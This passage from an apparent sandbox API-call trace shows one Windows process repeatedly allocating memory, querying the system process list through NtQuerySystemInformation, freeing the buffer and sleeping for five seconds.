ResultLength=0x0) returned 0x0 [0255.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.480] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.487] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.494] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.508] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.523] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.544] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.559] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.042] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.052] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.061] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.064] NtAllocateVirtualMemory (in: 